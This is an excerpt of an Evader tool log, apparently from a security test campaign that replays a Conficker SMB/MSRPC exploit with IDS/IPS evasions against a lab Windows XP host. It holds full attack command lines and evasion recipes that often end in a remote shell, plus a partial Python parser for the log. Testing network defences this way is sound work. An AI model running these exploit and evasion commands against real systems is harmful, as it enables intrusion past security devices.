  4956. Info: Using random seed qI+MyxnbeGi
  4957. The following evasions are applied from stage start to msrpc_bind:
  4958. - IPv4 fragments with at most 1464 bytes per fragment
  4959. The following evasions are applied from stage netbios_connect to msrpc_req:
  4960. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
  4961.  
  4962. Info: NetBIOS connection 10.62.90.118:59785 -> 10.35.1.207:445
  4963. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4964. Info: Sending MSRPC request with exploit
  4965. Info: Shell found, attack succeeded
  4966. Info: Shell closed
  4967. 0: Success.
  4968. ..
  4969. 8512 runs averaging 1.93 runs / second ; progress: 4419/43200.....2015-06-08 00:33:12 INFO
  4970. Success. (10.62.90.118):
  4971. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15707 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=i/S3e+bhers --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_null_trailer" --evasion=[msrpc_req,end]tcp_paws,"50%","196394028","shuffle" --verifydelay=1000 --payload=shell
  4972. Info: Using random seed i/S3e+bheru
  4973. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4974. - The SMB filename is obfuscated:
  4975. * Random characters case is changed
  4976. * A 0x00 and random alphanumeric characters are appended to the filename
  4977. The following evasions are applied from stage msrpc_req to end:
  4978. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 196394028> and has shuffled original payload
  4979.  
  4980. Info: NetBIOS connection 10.62.90.118:15707 -> 10.35.1.207:445
  4981. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4982. Info: Sending MSRPC request with exploit
  4983. Info: Shell found, attack succeeded
  4984. Info: Shell closed
  4985. 0: Success.
  4986. ..
  4987. 8520 runs averaging 1.93 runs / second ; progress: 4424/43200......
  4988. 8526 runs averaging 1.92 runs / second ; progress: 4429/43200....
  4989. 8530 runs averaging 1.92 runs / second ; progress: 4434/43200.....
  4990. 8535 runs averaging 1.92 runs / second ; progress: 4439/43200....2015-06-08 00:33:33 INFO
  4991. Success. (10.62.90.118):
  4992. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10990 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=KwjnkM1JXmw --evasion=[smb_connect,smb_openpipe]smb_decoytrees,"7","7","8","random_msrpcbind" --evasion=[msrpc_req,end]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","zero" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","161608787","alpharandomized" --verifydelay=1000 --payload=shell
  4993. Info: Using random seed KwjnkM1JXmw
  4994. The following evasions are applied from stage smb_connect to smb_openpipe:
  4995. - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  4996. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4997. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161608787> and has original payload with alphabetic bytes randomized
  4998. The following evasions are applied from stage msrpc_req to end:
  4999. - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
  5000. * Invalid TCP checksum.
  5001. * NULL TCP checksum.
  5002. * NULL TCP control flags.
  5003. * TCP header shorter than 20 bytes
  5004. * TCP header longer than packet total size
  5005. * Duplicate packet has 0x00 bytes as payload
  5006.  
  5007. Info: NetBIOS connection 10.62.90.118:10990 -> 10.35.1.207:445
  5008. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5009. Info: Sending MSRPC request with exploit
  5010. Info: Shell found, attack succeeded
  5011. Info: CommandShell::SendCommand() - Failed to send string
  5012. Info: Command shell connection reset.
  5013. Info: Shell closed
  5014. 0: Success.
  5015. .
  5016. 8541 runs averaging 1.92 runs / second ; progress: 4444/43200.....
  5017. 8546 runs averaging 1.92 runs / second ; progress: 4449/43200.......
  5018. 8553 runs averaging 1.92 runs / second ; progress: 4454/43200..Pid 4069 timed out - killed
  5019. 2015-06-08 00:33:46 INFO
  5020. Timed out (10.62.90.111):
  5021. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45678 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=nv0/I9X2yH0 --evasion=[start,smb_openpipe]ipv4_frag,"1264" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  5022. Info: Using random seed nv0/I9X2yH2
  5023. The following evasions are applied from stage start to smb_openpipe:
  5024. - IPv4 fragments with at most 1264 bytes per fragment
  5025. The following evasions are applied from stage smb_openpipe to msrpc_req:
  5026. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  5027.  
  5028. Info: NetBIOS connection 10.62.90.111:45678 -> 10.35.1.207:445
  5029. Terminated
  5030. ...
  5031. 8559 runs averaging 1.92 runs / second ; progress: 4459/43200
  5032. 8559 runs averaging 1.92 runs / second ; progress: 4464/43200..
  5033. 8561 runs averaging 1.92 runs / second ; progress: 4469/43200Pid 4398 timed out - killed
  5034. 2015-06-08 00:34:00 INFO
  5035. Timed out (10.62.90.115):
  5036. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60638 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=20s+1xE/E2Q --evasion=[msrpc_req,end]netbios_chaff,"1","empty_keepalive|http_post|msrpc_req" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  5037. Info: Using random seed 20s+1xE/E2T
  5038. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5039. - 75% probability to add a zero urgent data byte to a TCP segment.
  5040. The following evasions are applied from stage msrpc_req to end:
  5041. - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  5042.  
  5043. Info: NetBIOS connection 10.62.90.115:60638 -> 10.35.1.207:445
  5044. Terminated
  5045. ...........
  5046. 8573 runs averaging 1.92 runs / second ; progress: 4475/432002015-06-08 00:34:05 INFO
  5047. Success. (10.62.90.111):
  5048. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22375 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=XYxpSCVMOvI --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"509","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","43065069","shuffle" --verifydelay=1000 --payload=shell
  5049. Info: Using random seed XYxpSCVMOvJ
  5050. The following evasions are applied from stage smb_connect to msrpc_bind:
  5051. - 509 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  5052. The following evasions are applied from stage smb_opentree to msrpc_req:
  5053. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43065069> and has shuffled original payload
  5054.  
  5055. Info: NetBIOS connection 10.62.90.111:22375 -> 10.35.1.207:445
  5056. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5057. Info: Sending MSRPC request with exploit
  5058. Info: Shell found, attack succeeded
  5059. Info: Shell closed
  5060. 0: Success.
  5061. ...........
  5062. 8585 runs averaging 1.92 runs / second ; progress: 4480/43200............
  5063. 8597 runs averaging 1.92 runs / second ; progress: 4485/43200..............
  5064. 8611 runs averaging 1.92 runs / second ; progress: 4490/43200..............
  5065. 8625 runs averaging 1.92 runs / second ; progress: 4495/43200...........
  5066. 8636 runs averaging 1.92 runs / second ; progress: 4500/43200.Pid 4839 timed out - killed
  5067. 2015-06-08 00:34:31 INFO
  5068. Timed out (10.62.90.113):
  5069. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b9XU0yKQnxs --evasion=[start,netbios_connect]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  5070. Info: Using random seed b9XU0yKQnxt
  5071. The following evasions are applied from stage start to netbios_connect:
  5072. - IPv4 fragments with at most 48 bytes per fragment
  5073. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5074. - 75% probability to add a random urgent data byte to a TCP segment.
  5075.  
  5076. Info: NetBIOS connection 10.62.90.113:22602 -> 10.35.1.207:445
  5077. Terminated
  5078. .........
  5079. 8647 runs averaging 1.92 runs / second ; progress: 4505/43200............2015-06-08 00:34:38 INFO
  5080. Success. (10.62.90.111):
  5081. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25522 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F5bVtHv8w7c --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"change_case" --evasion=[start,end]tcp_paws,"3","126118068","random_alphanum" --verifydelay=1000 --payload=shell
  5082. Info: Using random seed F5bVtHv8w7c
  5083. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 126118068> and has random alphanumeric bytes as payload
  5084. The following evasions are applied from stage smb_openpipe to msrpc_req:
  5085. - The SMB filename is obfuscated:
  5086. * Random characters case is changed
  5087.  
  5088. Info: NetBIOS connection 10.62.90.111:25522 -> 10.35.1.207:445
  5089. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5090. Info: Sending MSRPC request with exploit
  5091. Info: Shell found, attack succeeded
  5092. Info: CommandShell::SendCommand() - Failed to send string
  5093. Info: Command shell connection reset.
  5094. Info: Shell closed
  5095. 0: Success.
  5096. ....
  5097. 8664 runs averaging 1.92 runs / second ; progress: 4510/43200..........
  5098. 8674 runs averaging 1.92 runs / second ; progress: 4515/43200.......
  5099. 8681 runs averaging 1.92 runs / second ; progress: 4520/43200.........
  5100. 8690 runs averaging 1.92 runs / second ; progress: 4525/43200.............
  5101. 8703 runs averaging 1.92 runs / second ; progress: 4530/43200...........
  5102. 8714 runs averaging 1.92 runs / second ; progress: 4535/43200..........
  5103. 8724 runs averaging 1.92 runs / second ; progress: 4540/43200..........
  5104. 8734 runs averaging 1.92 runs / second ; progress: 4545/43200.......2015-06-08 00:35:18 INFO
  5105. Success. (10.62.90.118):
  5106. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42635 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=TuoN/Fks6dA --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"24" --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[msrpc_bind,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
  5107. Info: Using random seed TuoN/Fks6dB
  5108. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5109. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  5110. The duplicate packet has identical payload except that alphanumeric characters are randomized
  5111. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5112. - IPv4 fragments with at most 24 bytes per fragment
  5113. The following evasions are applied from stage msrpc_bind to end:
  5114. - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  5115.  
  5116. Info: NetBIOS connection 10.62.90.118:42635 -> 10.35.1.207:445
  5117. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5118. Info: Sending MSRPC request with exploit
  5119. Info: Shell found, attack succeeded
  5120. Info: Shell closed
  5121. 0: Success.
  5122. .......
  5123. 8749 runs averaging 1.92 runs / second ; progress: 4550/43200.............
  5124. 8762 runs averaging 1.92 runs / second ; progress: 4555/43200...........2015-06-08 00:35:28 INFO
  5125. Success. (10.62.90.119):
  5126. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36182 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HBD+cGWNJlg --evasion=[netbios_connect,end]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","51055844","random_alphanum" --verifydelay=1000 --payload=shell
  5127. Info: Using random seed HBD+cGWNJlg
  5128. The following evasions are applied from stage netbios_connect to end:
  5129. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  5130. The duplicate packet has NULL bytes for payload
  5131. The following evasions are applied from stage msrpc_bind to end:
  5132. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 51055844> and has random alphanumeric bytes as payload
  5133.  
  5134. Info: NetBIOS connection 10.62.90.119:36182 -> 10.35.1.207:445
  5135. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5136. Info: Sending MSRPC request with exploit
  5137. Info: Shell found, attack succeeded
  5138. Info: Shell closed
  5139. 0: Success.
  5140. ........
  5141. 8782 runs averaging 1.93 runs / second ; progress: 4560/43200
  5142. 8782 runs averaging 1.92 runs / second ; progress: 4565/43200..2015-06-08 00:35:37 INFO
  5143. Success. (10.62.90.111):
  5144. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35443 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=PMOGjF6h7ww --evasion=[smb_connect,smb_openpipe]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_opentree,end]tcp_paws,"5","8","random" --verifydelay=1000 --payload=shell
  5145. Info: Using random seed PMOGjF6h7ww
  5146. The following evasions are applied from stage smb_connect to smb_openpipe:
  5147. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5148. The following evasions are applied from stage smb_opentree to end:
  5149. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
  5150.  
  5151. Info: NetBIOS connection 10.62.90.111:35443 -> 10.35.1.207:445
  5152. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5153. Info: Sending MSRPC request with exploit
  5154. Info: Shell found, attack succeeded
  5155. Info: Shell closed
  5156. 0: Success.
  5157. ......
  5158. 8791 runs averaging 1.92 runs / second ; progress: 4570/43200............
  5159. 8803 runs averaging 1.92 runs / second ; progress: 4575/43200..................
  5160. 8821 runs averaging 1.93 runs / second ; progress: 4580/43200............
  5161. 8833 runs averaging 1.93 runs / second ; progress: 4585/43200.......
  5162. 8840 runs averaging 1.93 runs / second ; progress: 4590/43200......
  5163. 8846 runs averaging 1.92 runs / second ; progress: 4595/43200....
  5164. 8850 runs averaging 1.92 runs / second ; progress: 4600/43200.........
  5165. 8859 runs averaging 1.92 runs / second ; progress: 4605/43200.............
  5166. 8872 runs averaging 1.92 runs / second ; progress: 4611/43200...2015-06-08 00:36:21 INFO
  5167. Success. (10.62.90.118):
  5168. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35389 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=T0PbYlV/b4Y --evasion=[smb_openpipe,end]smb_fnameobf,"add_paths" --evasion=[msrpc_req,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
  5169. Info: Using random seed T0PbYlV/b4Z
  5170. The following evasions are applied from stage smb_openpipe to end:
  5171. - The SMB filename is obfuscated:
  5172. * Dummy paths are added ( a/b -> a/c/../b )
  5173. The following evasions are applied from stage msrpc_req to end:
  5174. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
  5175.  
  5176. Info: NetBIOS connection 10.62.90.118:35389 -> 10.35.1.207:445
  5177. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5178. Info: Sending MSRPC request with exploit
  5179. Info: Shell found, attack succeeded
  5180. Info: Shell closed
  5181. 0: Success.
  5182. ....Pid 6902 timed out - killed
  5183. 2015-06-08 00:36:24 INFO
  5184. Timed out (10.62.90.114):
  5185. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52459 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4c8g/DIFW7I --evasion=[smb_openpipe,msrpc_req]smb_chaff,"13","write_flag","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  5186. Info: Using random seed 4c8g/DIFW7L
  5187. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5188. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  5189. The following evasions are applied from stage smb_openpipe to msrpc_req:
  5190. - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  5191.  
  5192. Info: NetBIOS connection 10.62.90.114:52459 -> 10.35.1.207:445
  5193. Terminated
  5194. ..
  5195. 8883 runs averaging 1.92 runs / second ; progress: 4616/43200......
  5196. 8889 runs averaging 1.92 runs / second ; progress: 4621/43200....
  5197. 8893 runs averaging 1.92 runs / second ; progress: 4626/43200.........
  5198. 8902 runs averaging 1.92 runs / second ; progress: 4631/43200
  5199. 8902 runs averaging 1.92 runs / second ; progress: 4636/43200
  5200. 8902 runs averaging 1.92 runs / second ; progress: 4641/43200......
  5201. 8908 runs averaging 1.92 runs / second ; progress: 4646/43200.........
  5202. 8917 runs averaging 1.92 runs / second ; progress: 4651/43200.......
  5203. 8924 runs averaging 1.92 runs / second ; progress: 4656/43200..
  5204. 8926 runs averaging 1.92 runs / second ; progress: 4661/43200.
  5205. 8927 runs averaging 1.91 runs / second ; progress: 4666/43200.Pid 7659 timed out - killed
  5206. 2015-06-08 00:37:18 INFO
  5207. Timed out (10.62.90.117):
  5208. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48863 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=iOiNE51qbIE --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"8","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
  5209. Info: Using random seed iOiNE51qbIG
  5210. The following evasions are applied from stage netbios_connect to msrpc_bind:
  5211. - Add a random alphanumeric urgent data byte to every 8 TCP segment.
  5212. The following evasions are applied from stage smb_openpipe to end:
  5213. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
  5214.  
  5215. Info: NetBIOS connection 10.62.90.117:48863 -> 10.35.1.207:445
  5216. Terminated
  5217. .....
  5218. 8934 runs averaging 1.91 runs / second ; progress: 4671/43200..Pid 7806 timed out - killed
  5219. 2015-06-08 00:37:22 INFO
  5220. Timed out (10.62.90.116):
  5221. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52933 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Iv5+sA53FSw --evasion=[smb_opentree,smb_openpipe]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  5222. Info: Using random seed Iv5+sA53FSw
  5223. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5224. - 25% probability to add a zero urgent data byte to a TCP segment.
  5225. The following evasions are applied from stage smb_opentree to smb_openpipe:
  5226. - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  5227.  
  5228. Info: NetBIOS connection 10.62.90.116:52933 -> 10.35.1.207:445
  5229. Terminated
  5230. .....Pid 7870 timed out - killed
  5231. 2015-06-08 00:37:25 INFO
  5232. Timed out (10.62.90.110):
  5233. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25618 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sgNECLIvgpo --evasion=[smb_connect,end]tcp_chaff,"8","nullchksum|nullflag|shorthdr","shuffle" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  5234. Info: Using random seed sgNECLIvgpq
  5235. The following evasions are applied from stage smb_connect to end:
  5236. - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
  5237. * NULL TCP checksum.
  5238. * NULL TCP control flags.
  5239. * TCP header shorter than 20 bytes
  5240. * Duplicate packet has shuffled original payload
  5241. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  5242. - Add a zero urgent data byte to every 3 TCP segment.
  5243. The following evasions are applied from stage smb_openpipe to end:
  5244. - 75% probability to add a random urgent data byte to a TCP segment.
  5245.  
  5246. Info: NetBIOS connection 10.62.90.110:25618 -> 10.35.1.207:445
  5247. Terminated
  5248.  
  5249. 8943 runs averaging 1.91 runs / second ; progress: 4676/43200...................
  5250. 8962 runs averaging 1.91 runs / second ; progress: 4681/43200.........2015-06-08 00:37:33 INFO
  5251. Success. (10.62.90.113):
  5252. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57107 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=2vlqNASig6Q --evasion=[smb_openpipe,end]smb_decoytrees,"4","2","3","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_chaff,"21","nullchksum|nullflag|outofwindow|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
  5253. Info: Using random seed 2vlqNASig6T
  5254. The following evasions are applied from stage smb_openpipe to end:
  5255.  
  5256. - Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  5257.  
  5258. Info: NetBIOS connection 10.62.90.113:57107 -> 10.35.1.207:445
  5259. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5260. Info: Sending MSRPC request with exploit
  5261. Info: Shell found, attack succeeded
  5262. Info: Shell closed
  5263. 0: Success.
  5264. .......2015-06-08 00:37:35 INFO
  5265. Success. (10.62.90.115):
  5266. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17874 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=TcBcODpf5zs --evasion=[msrpc_req,end]tcp_paws,"1","7","zero" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  5267. Info: Using random seed TcBcODpf5zt
  5268. The following evasions are applied from stage netbios_connect to msrpc_req:
  5269. - TCP timestamps echo reply value is sent in the wrong endianness
  5270. The following evasions are applied from stage msrpc_req to end:
  5271. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has 0x00 bytes as payload
  5272.  
  5273. Info: NetBIOS connection 10.62.90.115:17874 -> 10.35.1.207:445
  5274. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5275. Info: Sending MSRPC request with exploit
  5276. Info: Shell found, attack succeeded
  5277. Info: Shell closed
  5278. 0: Success.
  5279. .
  5280. 8981 runs averaging 1.92 runs / second ; progress: 4686/43200..............
  5281. 8995 runs averaging 1.92 runs / second ; progress: 4691/43200.....Pid 7992 timed out - killed
  5282. 2015-06-08 00:37:44 INFO
  5283. Timed out (10.62.90.112):
  5284. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26909 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CqYGL7dhLx0 --evasion=[smb_connect,smb_opentree]tcp_chaff,"50%","chksum|outofwindow|shorthdr","zero" --evasion=[msrpc_req,end]tcp_paws,"1","6","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  5285. Info: Using random seed CqYGL7dhLx0
  5286. The following evasions are applied from stage smb_connect to smb_opentree:
  5287. - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  5288. * Invalid TCP checksum.
  5289. * An out-of-window sequence number.
  5290. * TCP header shorter than 20 bytes
  5291. * Duplicate packet has 0x00 bytes as payload
  5292. The following evasions are applied from stage smb_opentree to msrpc_bind:
  5293. - Add a random alphaurgent data byte to every 2 TCP segment.
  5294. The following evasions are applied from stage msrpc_req to end:
  5295. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 0x00 bytes as payload
  5296.  
  5297. Info: NetBIOS connection 10.62.90.112:26909 -> 10.35.1.207:445
  5298. Terminated
  5299. .....
  5300. 9006 runs averaging 1.92 runs / second ; progress: 4696/43200..................
  5301. 9024 runs averaging 1.92 runs / second ; progress: 4701/43200.....2015-06-08 00:37:52 INFO
  5302. Success. (10.62.90.117):
  5303. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65431 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OeNPvjc5Qpo --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"75%","inc","random_alpha" --evasion=[msrpc_req,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
  5304. Info: Using random seed OeNPvjc5Qpo
  5305. The following evasions are applied from stage netbios_connect to msrpc_bind:
  5306. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  5307. The duplicate packet has random alphabetic bytes as payload
  5308. The following evasions are applied from stage msrpc_req to end:
  5309. - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  5310.  
  5311. Info: NetBIOS connection 10.62.90.117:65431 -> 10.35.1.207:445
  5312. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  5313. Info: Sending MSRPC request with exploit
  5314. Info: Shell found, attack succeeded
  5315. Info: CommandShell::SendCommand() - Failed to send string
  5316. Info: Command shell connection reset.
  5317. Info: Shell closed
  5318. 0: Success.
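Every run in this log has the same shape: a "Success." or "Timed out" header carrying the source address, the evader command line with its --evasion options, a few Info lines, and a "0: Success." or "Terminated" footer. Some runs counted as "Success." also report that the shell was found but reset before a command could be sent, which is worth tracking separately when judging what actually got through. The following Python helper is an added example, not part of the original paste or of the Evader tool: it parses records of that shape and tallies outcomes per evasion module. The sample log embedded in it is constructed to mirror records on this page, with a shortened --uid and without the pastebin line numbers.

```python
"""Summarise Evader/mongbat run records like the ones on this page.

Added example, not part of the original log or of the Evader tool. It recognises
the record shape visible above: a 'Success. (ip):' or 'Timed out (ip):' header,
the evader command line, Info lines, and a '0: Success.' or 'Terminated' footer.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, List

HEADER = re.compile(r"(Success\.|Timed out) \((\d+\.\d+\.\d+\.\d+)\):\s*$")
EVASION = re.compile(r'--evasion=\[(\w+),(\w+)\](\w+)((?:,"[^"]*")*)')
SHELL_TROUBLE = ("Command shell connection reset", "Failed to send string")


def parse_records(text: str) -> List[dict]:
    """Split the log into records carrying outcome, source IP, evasions and exit."""
    records: List[dict] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.search(line)
        if m:
            cur = {"outcome": "timed_out" if m.group(1) == "Timed out" else "success",
                   "src_ip": m.group(2), "evasions": [], "exit": None}
            records.append(cur)
            continue
        if cur is None:
            continue                      # progress counters, seeds, pid notices
        if "/evader " in line and "--evasion=" in line:
            for frm, to, module, argstr in EVASION.findall(line):
                cur["evasions"].append({"module": module, "from": frm, "to": to,
                                        "args": re.findall(r'"([^"]*)"', argstr)})
        elif any(s in line for s in SHELL_TROUBLE) and cur["outcome"] == "success":
            cur["outcome"] = "success_shell_reset"   # shell found, command never sent
        elif line == "0: Success.":
            cur["exit"] = 0
        elif line == "Terminated":
            cur["exit"] = "terminated"
    return records


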